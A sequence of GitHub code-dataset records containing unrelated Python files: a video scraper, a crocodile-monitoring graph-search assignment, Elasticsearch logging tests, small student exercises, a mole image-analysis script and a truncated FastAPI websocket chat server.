ICredentialsResetPlugin)\n","repo_name":"collective/pas.plugins.headers","sub_path":"src/pas/plugins/headers/setuphandlers.py","file_name":"setuphandlers.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"27988811511","text":"#-*- codeing = utf-8 -*-\n#@Time : 2021/7/21 下午12:35\n#@Author : yuming shen\n#@File : 线程池爬取梨视频.py\n#@Software :PyCharm\n\nimport requests\nimport re\nfrom lxml import etree\nfrom multiprocessing.dummy import Pool\n\nheaders = {\n \"user-agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\"\n}\nurl = 'http://www.pearvideo.com/category_5'\n\npage_text = requests.get(url=url,headers=headers).text\n\n#解析\ntree = etree.HTML(page_text)\nli_list = tree.xpath('//ul[@class=\"listvideo-list clearfix\"]/li')\nurls = [] #存储所有视频链接和名字\nfor li in li_list:\n detail_ul = 'http://www.pearvideo.com/'+li.xpath('./div/a/@href')[0]\n detail_name = li.xpath('./div/a/div[2]/text()')[0]+'.mp4'\n print(detail_name,detail_ul)\n #对详情页地址发请求,解析出视频地址\n detail_page_text = requests.get(url=detail_ul,headers=headers).text\n print(detail_page_text)\n break\n\n ex = 'srcUrl=\"(.*?)\",vdoUrl'\n video_url = re.findall(ex,detail_page_text)\n dic = {\n 'name':detail_name,\n 'url':video_url\n }\n urls.append(dic)\n\ndef get_video_data(dic):\n url = dic['url']\n data = requests.get(url=url,headers=headers).content\n with open(dic['name'],'wb') as fp:\n fp.write(data)\n\npool = Pool(4)\npool.map(get_video_data,urls)\n\npool.close()\npool.join()","repo_name":"yumingshen1/untitled","sub_path":"lufei/线程池爬取梨视频.py","file_name":"线程池爬取梨视频.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"15174557957","text":"\"\"\"\nSEMESTER 2/2021 \n\nHIT 200 - ALGORITHMS AND COMPLEXITY\n\nLAB ASSESSMENT 3 \n\nGroup 3 members:\n\nStudent Name Student ID\n1. Dinh Gia Bao Hoang S346284\n2. Mathews Job S341408 \n3. Tai Phu Phan S342489 \n\n\"\"\"\n\nfrom typing import Sized\nimport csv\n\nimport math\nimport numpy as np\nsize=100\nclass CrocMonitor:\n locationList =[]\n import csv\n def __init__(self, size):\n \n self.locationList = []\n self.matrix = [[0 for x in range(size)]for y in range(size)]\n self.points=[]\n \n \"\"\"\n self.d: 1D matrix to store the shortest path to current vertex\n self.Trace: 1D matrix to store the previous vertex to the current vertext in the shortest path\n for example: Trace[u] = v, means v is the previous vertex of u in the shortest path\n self.Free: 1D matrix to check whether vertex is visited or not\n for example: Free[u] = True, means vertex u is visited.\n self.Start: the starting vertex\n self.Finish: the finishing vertex\n self.paths: all paths from Start to Finish \n \n \"\"\"\n self.d = [] \n self.Trace = []\n self.Free = [] \n self.Start = 0 \n self.Finish = 0\n self.paths = []\n \n self.readData()\n self.storeDistance()\n\n \"\"\"\n Function: readData(self)\n Purpose: read location file and update location list and the point array.\n Input: None\n Output: None\n Example: readData()\n \n \"\"\"\n def readData(self):\n with open('Locations.csv') as f:\n csv_reader = csv.reader(f)\n index = 0\n next(csv_reader)\n for line in csv_reader:\n \n pointName=line[0]\n x=line[1]\n y=line[2]\n number=line[3]\n edge=line[4]\n \n water=False\n if line[5] == \"W\":\n water=True\n\n self.locationList .append( [pointName, x, y, number, edge, water] ) # etc\n \n if not pointName in self.points:\n \n self.points.append(pointName)\n index += 1\n \n f.close()\n\n \n \"\"\"\n Function: storeDistance(self)\n Purpose: store distance of all adjacent vertices\n Input: None\n Output: None\n Example: storeDistance()\n \n This function will traverse locationList row by row, pick up star point and end point\n calculate distance between the two and store it in the matrix. \n \n This is an undirected graph so matrix[a][b] = matrix[b][a] \n \n \"\"\"\n def storeDistance(self):\n \n for index in range(0, len(self.locationList)-1):\n \n startpoint = self.locationList[index][0]\n endpoint = self.locationList[index][4]\n \n if startpoint != \"\" and endpoint != \"\":\n distance = self.computeDistance(startpoint, endpoint)\n \n #position in the adjacent matrix\n indexa = self.points.index(startpoint)\n indexb = self.points.index(endpoint)\n \n #add the weighting of the edge\n self.matrix[indexa][indexb] = distance\n self.matrix[indexb][indexa] = distance \n \n \"\"\"\n Function: computePathDistance(self, path)\n Purpose: compute distance of all the connected vertices in a path \n Input: a path including all connected vertices\n Output: distance of a given path\n Example: computePathDistance(self, [\"15\",\"16\",\"18\"])\n \n \"\"\"\n def computePathDistance (self,path):\n \n #provide the distance between two points a and b, as the end points on a path. Assume not adjacent\n distance=0\n \n for i in range(len(path)-1):\n distance = distance + self.matrix[self.points.index(path[i])][self.points.index(path[i+1])] \n \n return distance \n \n \n \"\"\"\n Function: computeDistance(self, a, b)\n Purpose: compute distance of two adjacent location\n Input: location a and b\n Output: distance of adjacent location\n Example: computeDistance(\"15\",\"18\")\n \n This function will find the index of location a and b in the location list,\n get the respective x and y, then calculate the distance using the pythago \n theorem between two points\n \n \"\"\"\n def computeDistance (self, a, b):\n \n # provide the distance between two points a and b on a path. Assume adjacent\n distance=0\n \n #convert locationList into numpy list for searching purpose\n l = np.array(self.locationList)[:,0] \n \n #index of a and b in the location list\n indexa = np.where(l==a)[0][0]\n indexb = np.where(l==b)[0][0]\n \n xa = int(self.locationList[indexa][1])\n ya = int(self.locationList[indexa][2])\n xb = int(self.locationList[indexb][1])\n yb = int(self.locationList[indexb][2])\n \n #calculate distance between a and b\n distance = math.sqrt((xa-xb)**2 + (ya-yb)**2)\n \n return distance\n\n \"\"\"\n Function: findPath(self, a, b)\n Purpose: finding the shortest path from a to\n Input: location a and b\n Output: shortest path and distance\n Example: findPath(\"15\",\"18\") -> [\"15\",\"16\",\"18\"], 8.94\n \n This function finds the shortest path from a to b, and based on the Dijkstra algorithm \n \n \"\"\"\n def findPath(self,a,b):\n #returns shortest path a to b\n \n #init the Graph\n self.InitGraph(a,b)\n #assume the infinity number\n MAX = 1000000\n path = [] \n \n while True:\n min = MAX+1\n u = 0 \n \n #finding the vertex which having shortest path\n for i in range(len(self.points)):\n if self.Free[i] and min > self.d[i]:\n min = self.d[i]\n u = i\n \n #if the Finish vertex is reached\n if u == self.Finish: \n break\n \n # vertex u is marked as visited (i.e. not free)\n self.Free[u] = False \n \n for v in range(len(self.points)):\n if self.matrix[u][v] != 0: \n #if the shortest path from Start to vertex v greater than \n #the shortest path from Start to u and distance from u to v\n #then update the distance from Start to v \n if self.d[v] > self.d[u] + self.matrix[u][v]:\n self.d[v] = self.d[u] + self.matrix[u][v]\n self.Trace[v] = u\n \n #trace the shortest path\n if self.d[self.Finish] == MAX: #no path from Start to End\n self.d[self.Finish] = -1\n else:\n u = self.Finish\n while self.Start != u:\n path.append(self.points[u])\n u = self.Trace[u] \n path.append(self.points[self.Start]) \n path.reverse() \n \n return path, self.d[self.Finish] \n\n\n \"\"\"\n Function: computCosting(self, a, b)\n Purpose: find all points on path between a and b, then adding neighbours of internal points on path \n Input: location of a and b\n Output: exhausitve path and costing\n Example: computeCosting(\"15\",\"18\") -> ['15','16','17','16','18'], 0.45\n \n \"\"\"\n def computeCosting(self, a, b):\n # unit costs for scanning all points on all paths between two locations and give exhaustive path for rangers to follow, returned as an list\n path=[]\n costing=0\n speed = 40 \n distance = 0\n \n #all points on path between two locations, and the exhaustive search (i.e. neighbours of internal)\n pointList, path = self.findScope(a, b)\n \n print(\"All points for rangers to inspect: \", pointList)\n print(\"Exhaustive search path: \", path)\n for i in range(len(path)-1):\n #get the distance between two adjacent vertices through location matrix\n d = self.matrix[self.points.index(path[i])][self.points.index(path[i+1])] \n\n #add-up the distance of the path\n distance = distance + d\n \n #format the output string\n if (i-1) >0 and path[i+1] == path[i-1]:\n str = path[i+1] + \" <- \" + path[i] + \": %.2f\"%d\n else:\n str = path[i] + \" -> \" + path[i+1] + \": %.2f\"%d \n \n print(str)\n \n #calcualte costing given assumed speed.\n costing = distance/speed \n \n print(\"Distance (km): %.2f\"%distance,\". Speed (km/h): %.2f\"%speed,\". Cost (units of hour): %.2f\"%costing)\n \n return costing,path\n \n \"\"\"\n Function: improveDistance(self, a, b)\n Purpose: find the shortest path from a to be, suggest the possible points to be blocked \n Input: location and and b\n Output: array of possible points to be blocked\n Example: improveDistance(\"15\",\"18\") -> ['Point: 16', 'Distance: 2.24', 'Ratio: 0.25']\n \n \"\"\"\n def improveDistance (self, a, b):\n #return point blocked as a value on map (eg A1) and scaled increase in distance between points\n points=[]\n scaledImprovement=0\n d = 0\n \n #find the shortest path between a and b\n path, shortest = self.findPath(a, b)\n print(f\"\\nThe shortest path: {path}\")\n print(\"Total distance: %.2f\"%shortest)\n \n #check for all internal points within the shortest path \n #if there is any neighbour then that point will be tracked for ranger to consider\n for i in range(1,len(path)-1):\n k = self.points.index(path[i])\n z = self.points.index(path[i-1])\n #calculate accumulated distance\n d += self.matrix[k][z]\n #check wether any point in the shortest path has neihgbour\n for j in range(len(self.points)):\n #if found any neighbour from point j then track the place for blockage\n if self.matrix[k][j] != 0 and self.points[j] not in path:\n points.append([\"Point: \"+path[i],\"Distance: %.2f\"%d,\"Ratio: %.2f\"%(d/shortest)])\n \n return points #,scaledImprovement\n\n\n \"\"\"\n Function: countCroc(self, beach, x)\n Purpose: find a location within the radius of the beach and number of crocs\n Input: beach and radius\n Output: list of location near the beach and the number of crocs\n Example: countCroc(\"B1\",10) -> [['22',1.0]\n ['B2',0.0]]\n \n \"\"\"\n \n def countCroc(self, beach, x):\n #count the number of crocs likely in a x mile radius of a beach. Return an array [location, number]\n \n #list of points within the radius of the beach\n list = []\n \n #convert locationList to numpy list for searching\n l = np.array(self.locationList)[:,0] \n \n nearest_point = \"\"\n nearest_distance = float(\"inf\")\n \n for i in range(len(self.points)):\n \n #distance between the beach and any point\n d = self.computeDistance(beach, self.points[i])\n \n #if less than radius\n if d > 0 and d <= x:\n \n #get the number of crocs\n j = np.where(l==self.points[i])[0][0] \n \n if self.locationList[j][3] != \"\":\n crocs = float(self.locationList[j][3])\n else: crocs = 0.\n \n list.append([self.points[i],crocs])\n \n #check nearest point \n if nearest_distance > d:\n nearest_distance = d\n nearest_point = [self.points[i],crocs]\n \n #last element is the nearest\n if nearest_point != \"\":\n list.append(nearest_point)\n \n return list\n \n \"\"\"\n Function locatOptimalBlockage(self, beach, radius, list)\n Purpose: find the nearest point to the beach, all shortest path from other point within radius to that nearest point\n Input: beach, radius and the list of points within the radius of the beach.\n Output: nearest point, list of shortest path to the nearest point and no of crocs.\n Example: locateOptimalBlockage(\"B3\",\"10\",list)\n \n \n \"\"\"\n def locateOptimalBlockage(self,beach,radius, list):\n # return the point blocked eg A1 and the increase in protection provided using some weighting\n point=\"\"\n protection=1\n crocs = 0\n paths = []\n \n if len(list) == 0:\n return \"\", None\n \n print(f\"\\nAll locations and number of crocs are within the radius {radius} of {beach}\")\n for i in range(len(list)-1):print(list[i])\n \n #nearest point to the beach (the last item in list)\n point = list[len(list)-1][0] \n \n #convert to list for counting the crocs\n #dic = {l[0]:l[1] for l in list}\n dic = dict(list)\n #find the shortest path from all points within radius to the nearest point and accumulate the crocs from the path\n for d in dic:\n if d != point:\n path,_ = self.findPath(d,point)\n crocs = 0\n for p in path:\n if p not in dic: \n crocs = 0\n break\n crocs += dic[p]\n \n if crocs !=0: \n paths.append([path,\"Crocs: %.2f\"%crocs])\n \n return point, paths #protection\n\n\n \"\"\"\n Function: MinTime(self, a, b)\n Purpose: points travelled through the shorest path from a to b \n Input: location a and b\n Output: array of points travelled and time value:\n Example: MinTime(\"15\", \"18\")\n -> points: [\"15\",\"16\",\"18\"]\n time value (hours): 0.56\n \n \"15\" -> \"16\" (water), distance: 2.36, speed: 16 (km/h), time value: 2.36/16 = 0.14\n \"16\" -> \"18\" (water), distance: 6.71, speed: 16 (km/h), time value: 6.71/16 = 0.42\n Total time value (hours): 0.56\n \n \"\"\"\n def minTime(self,a,b):\n #return list of points trevelled and the time required\n \n time = 0\n path = []\n trace = []\n water = \"\"\n \n #converst locationList to numpy list for search purpose\n l = np.array(self.locationList)[:,:] \n \n #finding the shortest path\n path,shortest = self.findPath(a, b) \n \n for i in range(len(path)-1,0,-1):\n #check the index of path[i-1] to path[i] in the locationList \n #l[:,0] is the first column of locationList: sight name\n #l[:,4] is the fifth column of locationList: neighbour\n j = np.where( (l[:,0]==path[i-1]) & (l[:,4]==path[i]))[0]\n \n #if not then search again in the listlocation\n #just change the path[i] to the first column and path[i-1] in the fifth column\n if len(j) == 0:\n j = np.where( (l[:,0]==path[i]) & (l[:,4]==path[i-1]))[0]\n \n #check the the given location of a and be is water or land, column 5 in listLocation\n if self.locationList[j[0]][5] == True:\n speed = 16.0\n water = \"Water\"\n else: \n speed = 6.0\n water = \"Land\"\n #find the index of two locations\n f = self.points.index(path[i-1])\n t = self.points.index(path[i])\n \n #calculate the unit of time given distance of two adjacent locations\n distance = self.matrix[f][t]\n time = time + distance/speed\n \n trace.insert(0,[path[i-1] + \"->\" +path[i],water,\n \"Distance: %.2f\"%distance,\n \"Speed: %.1f\"%speed,\n \"Time: %.2f\"% (distance/speed)])\n \n return path, trace, shortest,time\n \n\n \"\"\"\n Function: findScope(a, b)\n Purpose:\n Input: location a and b\n Output: pointList and exhaustive path \n Example: findScope(\"15\",\"18\") \n -> poinstList = [\"15\",\"16\",\"17\",\"18\"]\n exhaustive path = [\"15\",\"16\",\"17\",\"16\",\"18\"]\n \n This function will find the shortest path from a to b, add the neighbours for internal points\n between the path except a and b, the exhaustive path is built on these points\n \n \n \"\"\" \n def findScope(self, a, b):\n #provide start and end point of search, collect points to consider in search\n pointList=[a,b]\n expath = [a,b]\n \n #find location of a and b in points list\n for index in range(0, len(self.points)):\n if self.points[index ]== a:\n indexa=index\n if self.points[index] == b:\n indexb = index \n \n #Find all paths a to b - Select direct routes only, no cycles or backtracking \n self.FindAllPaths(a, b)\n print(f\"\\nAll possible paths from {a} to {b}: \")\n for p in self.paths:\n print(p)\n \n #Find shortest route from path options \n path, shortest = self.findPath(a, b)\n print(\"\\nShortest path: \", path,\" - Distance: %.2f\"%shortest)\n \n # Add side points to inspect\n #include all nodes that are linked to (neighbour of) any internal point on path (ie point crocodiles can enter) \n # between a and b - this may add backtracking\n \n #Add neighbours of each location except the starting and ending location\n for i in range(1, len(path)-1):\n \n #add path[i] into the pointlist then search for neighbours\n pointList.insert(len(pointList)-1,path[i])\n expath.insert(len(expath)-1,path[i])\n \n #check its index and neighbours\n j = self.points.index(path[i])\n \n for k in range(len(self.points)):\n #if points[k] is a nearest neighbour then add it up to the pointlist\n if self.matrix[j][k] != 0:\n if (self.points[k] not in pointList) and (self.points[k] not in path):\n #add the neighbour into point list\n pointList.insert(len(pointList)-1,self.points[k])\n #add the neighbour into exhaustive path, example i to k and k back to i\n expath.insert(len(expath)-1,self.points[k])\n expath.insert(len(expath)-1,path[i]) #backtrack\n \n #Example findScope (\"15\",\"18\") Dr. Cat's comment\n #paths are [15,16,18] and [15,16,17,19,20]\n #shortest path [15,16,18]\n #add neighbours [15,16,17,18]\n \n #This is the exhaustive list of points rangers need to inspect\n return pointList, expath\n\n \n \"\"\"\n Function: InitGraph(self, a, b)\n Purpose: initialize all the parameters for specific instance of the graph.\n Input: name location a and b\n Output: none\n Example: InitGraph(\"15\", \"18\")\n \n This function will inititalize for the parameters below:\n self.[d] set to infinite for all item assuming the shortest path to each vertex is infinity\n self.[Trace] set to -1 for all vertices\n self.[Free] set to True for all vertices \n self.paths set to null list\n self.Start will be the index of location a\n self.Finish will be the index of location b\n \n set the d[Start] = 0 means shortest path from Start to Start is 0\n \n \"\"\"\n def InitGraph(self, a, b):\n \n n = len(self.points)\n MAX = 1000000\n self.d = [MAX]*(n)\n self.Trace = [-1]*(n)\n self.Free = [True]*(n) \n self.paths = []\n \n #set the staring and finishing location\n self.Start = self.points.index(str(a))\n self.Finish = self.points.index(str(b))\n \n #shortest path from Start to Start is 0\n self.d[self.Start] = 0 \n \n \"\"\"\n Function: FindAllPaths(self, a, b)\n Purpose: find all possible paths from a to b\n Input: location a and b \n Output: None\n Example: FindAllPaths (\"15\",\"18\")\n\n This funciton will call another function InitGraph given first and second location to initialize all the \n parameters for the graph\n \n Then it will call Try function to start traversing from a, and find all possible paths from\n a to b. All the parameters will be updated once the Try function completes.\n \n \"\"\"\n def FindAllPaths(self, a, b):\n \n self.InitGraph(a, b)\n self.Try(self.Start)\n \n \n \"\"\"\n Function: Try(self, a)\n Purpose: traverse the locations on map\n Input: location a \n Output: None\n Example: Try(\"15\")\n \n This function is a recursive function given the first vertex then it will traverse all \n possible adjacent vertices until it reaches the target vertex then full path will be tracked\n or having no neighbours\n \n \"\"\"\n def Try(self, a):\n \n self.Free[a] = False\n #check for all other vertices\n for u in range(len(self.points)):\n #if adjacent and is not visited.\n if self.matrix[a][u] != 0 and self.Free[u] == True:\n #trace the path\n self.Trace[u] = a\n self.Free[u] = True\n #if the vertex u is the target\n if u == self.Finish: \n path =[]\n #trace the full path\n while self.Start != u:\n path.append(self.points[u])\n u = self.Trace[u] \n path.append(self.points[self.Start])\n path.reverse()\n #track the path into array of paths\n self.paths.append(path) \n return\n else:\n #try with vertex u if not adjacent. \n self.Try(u)\n self.Free[u] = True \n return \n \n\n\"\"\"\nFunction: Question1()\n\n\"\"\" \ndef Question1():\n \n print(\"\\nQuestion 1 - Exhaustive path and compute Costing: \")\n print(\"Assumption:\\nGiven two locations, we find the shortest path between these locations.\\nThen we find all points on this path and build the exhaustive path for rangers to inspect.\\nExhaustive path is built based by adding the neighbours of internal points on shortest path\")\n print(\"\\nInput two locations, example: 15 and 18\")\n location1 = input(\"Location 1: \")\n location2 = input(\"Location 2: \")\n \n cm.computeCosting(location1, location2)\n input(\"\\nPress Enter to continue...\")\n \n\"\"\"\nFuntion: Question2()\n\n\"\"\"\ndef Question2():\n \n print(\"\\nQuestion 2 - Improve Distance: \")\n print(\"\\nAssumption:\\nGiven two locations, we find the shortest path between these locations.\\nThen we traverse from the begining point to other points on the path until we reach any point having its neighbours (possibly to put the block) and calculate the ratio of its distance against the shortest path distance.\\nRangers will decide whether it is worth to put the blockage.\")\n print(\"\\nInput two locations, example: 19 and 22\")\n location1 = input(\"Location 1: \")\n location2 = input(\"Location 2: \")\n \n points = cm.improveDistance(location1, location2)\n \n if len(points) == 0:\n print(\"There is no any neighbour for any location within the shortest path. Rangers consider to place the blockage on any point in the path or elsewhere...\")\n else:\n print(\"Possible locations for rangers to consider to place a blockage: \")\n for p in points:print(p)\n \n input(\"\\nPress Enter to continue...\")\n \n\"\"\"\nFunction: Question3()\n\n\"\"\" \ndef Question3():\n \n print(\"\\nQuestion 3 - MinTime: \")\n print(\"\\nInput two locations, example: 19 and 22\")\n location1 = input(\"Location 1: \")\n location2 = input(\"Location 2: \")\n path, trace, distance,time = cm.minTime(location1, location2)\n print(\"\\nPoints travelled through the shortest path: \",path)\n for t in trace:\n print(t)\n print(\"Total distance (km): %.2f\"%distance)\n print(\"Time value (units of hour): %.2f\" %time)\n \n print(\"\\nQuestion 3 - Extension\")\n print(\"Assumption:\\nGiven the radius we find the nearest location to the beach. Then we find all the shortest paths from other points within radius of the beach to that nearest point and the accumulated number of crocs. Ranger will consider where to put the blockage. \")\n print(\"\\nInput the beach and radius. For example B3 and 10\")\n beach = input(\"Beach: \")\n radius = int(input(\"Radius: \"))\n list = cm.countCroc(beach,radius)\n \n point, paths = cm.locateOptimalBlockage(beach, radius,list)\n if point != \"\":\n print(f\"\\nNearest point to the beach {beach} is: {point}\")\n print(\"Shortest path from other points within radius of the beach to the nearest point is below.\\nRangers will consider to put the blockage\")\n for p in paths:\n print(p[0],\"-\", p[1])\n else:\n print(f\"No points within the radius of {radius} of {beach}\")\n \n input(\"\\nPress Enter to continue...\")\n \n \n#Driver code \nif __name__ == '__main__':\n \n cm=CrocMonitor(size) \n \n \"\"\"\n Dr. Cat Kutay's examples\n \n #print (cm.locationList)\n #Changed examples\n cm.computeCosting(\"15\",\"18\")\n \n # exhaustive path is [15,16, 17,16, 18] so return the length of this as unit cost - note data changes in Locations.csv\n #algorithm to find scope of spanning tree is provided as findScope()\n cm.improveDistance(\"15\",\"18\")\n #output will be 16 Ratio is \"original distance on [15,16,18]:0\"\n cm.locateOptimalBlockage(\"15\", \"18\")\n #returns 16 as other routes have alternative paths\n #may use other data to decide optimum path, but explain in requirements for this method\n cm.minTime(\"15\", \"18\") \n #returns [15,16,18] and time to travel that path\n \n \"\"\"\n \n Choice = \"\"\n Options ={\"1\":Question1,\"2\":Question2,\"3\":Question3} \n while True:\n print(\"\\nPress following key for the questions.\")\n print(\"1 for Question 1 - Exhaustive Path and Compute Costing\\n2 for Question 2 - Finding points to be blocked\\n3 for Question 3 - Couting Crocs and Optimum Blockage\\nOr any key to exit...\")\n Choice = input(\"Your input: \")\n if Choice not in Options:\n break\n #call the respective function\n Options[Choice]()\n print(\"Program End!!!\") \n\n ","repo_name":"phuphan13/Path-Algorithms-Crocodile-Monitoring","sub_path":"HIT 220_Assignment3_CrocMonitorExample_Group_3.py","file_name":"HIT 220_Assignment3_CrocMonitorExample_Group_3.py","file_ext":"py","file_size_in_byte":27370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"73498427719","text":"# coding: utf-8\nimport unittest\nimport time\nimport os\n\nfrom elasticsearch import Elasticsearch, helpers\nfrom elasticsearch_dsl import Search, Q, Index\n\nfrom elasticlog import Elasticlog\n\nHOST = os.environ.get('TEST_HOST', 'localhost')\nINDEX_NAME = 'index1'\n\ndef fixtures():\n TYPE = 'log_type'\n bulk_data = [\n {'_source': {'created_at':'2015-01-10', 'filename': 'views', 'level': 'ERROR', 'message': 'elasticsearch.exceptions.ConnectionError: ConnectionError'}, '_index': INDEX_NAME, '_type': TYPE},\n {'_source': {'created_at':'2015-01-02', 'filename': 'custom_views', 'level': 'ERROR', 'message': 'NameError: name \"request\" is not defined'}, '_index': INDEX_NAME, '_type': TYPE},\n {'_source': {'created_at':'2015-04-04', 'filename': 'models', 'level': 'DEBUG', 'message': 'AttributeError: \"str\" object has no attribute \"xpto\"'}, '_index': INDEX_NAME, '_type': TYPE},\n {'_source': {'created_at':'2015-02-21', 'filename': 'core.views', 'level': 'INFO', 'message': 'IndexError: list index out of range'}, '_index': INDEX_NAME, '_type': TYPE},\n {'_source': {'created_at':'2015-03-08', 'filename': 'util', 'level': 'DEBUG', 'message': 'MissingSchema: Invalid URL \"gustavo\": No schema supplied. Perhaps you meant http://gustavo?'}, '_index': INDEX_NAME, '_type': TYPE},\n {'_source': {'created_at':'2015-02-01', 'filename': 'api.views', 'level': 'ERROR', 'message': 'ERROR:django.request:Internal Server Error'}, '_index': INDEX_NAME, '_type': TYPE}\n ]\n es = Elasticsearch(hosts=[HOST])\n helpers.bulk(es, bulk_data)\n time.sleep(2)\n\n\nclass TestElasticlog(unittest.TestCase):\n\n def setUp(self):\n self.es = Elasticlog(hosts=[HOST], index=INDEX_NAME)\n\n def tearDown(self):\n Index(INDEX_NAME).delete()\n\n def test_should_insert_data(self):\n inserted = self.es.insert(filename='views.py', level='error', created_at='2015-07-18', message='object not found')\n self.assertTrue(inserted)\n\n def test_should_insert_empty_date_if_it_is_invalid(self):\n inserted = self.es.insert(filename='views.py', level='error', created_at='invalid', message='object not found')\n self.assertTrue(inserted)\n\n def test_should_list_the_first_ten(self):\n fixtures()\n\n logs = self.es.search()\n self.assertEquals(6, len(logs))\n\n log = logs[0]\n self.assertTrue(len(log.id) > 0)\n self.assertEquals(log.level, 'ERROR')\n self.assertEquals(log.filename, 'views')\n self.assertEquals(log.message, 'elasticsearch.exceptions.ConnectionError: ConnectionError')\n\n def test_should_paginate_the_result(self):\n fixtures()\n\n logs = self.es.search(page=1, per_page=2)\n self.assertEquals(2, len(logs))\n\n log = logs[0]\n self.assertTrue(len(log.id) > 0)\n self.assertEquals(log.level, 'ERROR')\n self.assertEquals(log.filename, 'views')\n self.assertEquals(log.message, 'elasticsearch.exceptions.ConnectionError: ConnectionError')\n\n def test_should_sort_asc(self):\n fixtures()\n logs = self.es.search(sort='created_at')\n log = logs[0]\n self.assertEquals(str(log.created_at), '2015-01-02 00:00:00')\n self.assertEquals(log.level, 'ERROR')\n self.assertEquals(log.filename, 'custom_views')\n self.assertEquals(log.message, 'NameError: name \"request\" is not defined')\n\n def test_should_sort_desc(self):\n fixtures()\n logs = self.es.search(sort='-created_at')\n log = logs[0]\n self.assertEquals(str(log.created_at), '2015-04-04 00:00:00')\n self.assertEquals(log.level, 'DEBUG')\n self.assertEquals(log.filename, 'models')\n self.assertEquals(log.message, 'AttributeError: \"str\" object has no attribute \"xpto\"')\n\n def test_should_filter_by_date_interval(self):\n fixtures()\n logs = self.es.search(start='2015-01-01T00:00:00', end='2015-02-21T00:00:00')\n self.assertEquals(4, len(logs))\n\n log = logs[0]\n self.assertEquals(str(log.created_at), '2015-01-10 00:00:00')\n self.assertEquals(log.level, 'ERROR')\n self.assertEquals(log.filename, 'views')\n self.assertEquals(log.message, 'elasticsearch.exceptions.ConnectionError: ConnectionError')\n\n def test_should_raises_exception_if_pass_an_invalid_date_interval(self):\n fixtures()\n try:\n logs = self.es.search(start='invalid', end='2015-02-21')\n fail()\n except:\n pass\n\n def test_should_count_the_total_of_logs(self):\n fixtures()\n response = self.es.count()\n self.assertEquals(response.get('count'), 6)\n\n\nclass TestTimeoutElasticlog(unittest.TestCase):\n\n def test_should_abort_if_waiting_for_long_time(self):\n es = Elasticlog(hosts=['172.17.0.254'], index='loggo', timeout=1, max_retries=0)\n try:\n es.insert(filename='views.py', level='error', created_at='invalid', message='object not found')\n fail()\n except:\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"gustavohenrique/elasticlog","sub_path":"elasticlog/test_elasticlog.py","file_name":"test_elasticlog.py","file_ext":"py","file_size_in_byte":5065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"7187412725","text":"a=['rishabh-meerut','imtiyaz-delhi','nilima-cochin','rati-shimla','ayishah-delhi',\n\"raghu-shimla\",'naseer-kanpur','kartikeya-delhi','salma-jaipur','pankaj-delhi',\n'bjijesh-delhi']\n# f=open('qtion4.txt','a')\nfor i in a:\n f=open(\"delhi.txt\",\"a\")\n if i==\"delhi\":\n f.append(i)\n if i==\"simls.txt\":\n f.append(i)\n f.close()\n\n# i=0\n# while i area = {area} px^2, ideal perimeter {ideal_perimeter} px, measuerd perimeter: {perimeter} px, ratio: {ratio}\")\n\n\"\"\"asymmetry\"\"\"\n(top_up, top_down, top_left, top_right) = crop.crop_image(filtered_mole, round(filtered_mole.shape[0]/2), round(filtered_mole.shape[1]/2))\nfiltered_mole = filtered_mole[top_up:top_down,top_left+1:top_right,:]\n(x,y) = asy.center_mole(filtered_mole,top_up, top_down, top_left, top_right)\nasy.ratio(filtered_mole,x,y)\n","repo_name":"jacopobr/features-extraction-moles-dataset","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"38309808733","text":"# student number\nn = int(input())\n\nkem_grade = []\nfor _ in range(n):\n name, kor, eng, math = input().split()\n kem_grade.append((name, int(kor), int(eng), int(math)))\n\nkem_grade.sort(key=lambda x: (-int(x[1]), int(x[2]), (-int(x[3])), x[0]))\n\n# print name\nfor student in kem_grade:\n print(student[0])","repo_name":"hunsoo0823/python_algorithm_second","sub_path":"sort/kem.py","file_name":"kem.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"23378248267","text":"from fastapi import FastAPI, Request, WebSocket, WebSocketDisconnect\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.staticfiles import StaticFiles\nfrom pydantic import BaseModel\nfrom databases import Database\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom typing import List\nimport json\n\napp = FastAPI()\n\norigins = [\"*\"]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\napp.mount(\"/static\", StaticFiles(directory=\"MeetingPage/static\"), name=\"static\")\n\ntemplates = Jinja2Templates(directory=\"MeetingPage/templates\")\n\n\n@app.get('/')\ndef home():\n return 'Hello world'\n\n\n@app.get(\"/meeting/{code}\")\ndef meeting(request: Request, code: str):\n return templates.TemplateResponse('Chatting.html', {\"request\": request, \"code\": code})\n\n\nclass ConnectionManager:\n def __init__(self):\n self.active_connections: List[WebSocket] = []\n\n async def connect(self, websocket: WebSocket):\n await websocket.accept()\n self.active_connections.append(websocket)\n\n def disconnect(self, websocket: WebSocket):\n self.active_connections.remove(websocket)\n\n async def send_personal_message(self, message: str, websocket: WebSocket):\n await websocket.send_text(message)\n\n async def broadcast(self, message: str):\n for connection in self.active_connections:\n await connection.send_text(message)\n\n\nmanager = ConnectionManager()\n\n\n@app.websocket(\"/ws/{client_id}\")\nasync def websocket_endpoint(websocket: WebSocket, client_id: str):\n await manager.connect(websocket)\n try:\n while True:\n data = await websocket.receive_text()\n # await manager.send_personal_message(f\"You wrote: {data}\", websocket)\n datas = {'client_id': client_id, 'data': data}\n await manager.broadcast(json.dumps(datas))\n except WebSocketDisconnect:\n manager.disconnect(websocket)\n await manager.broadcast(f\"Client #{client_id} left the chat\")\n\n\nclass Chat(BaseModel):\n message: str\n user: str\n time: 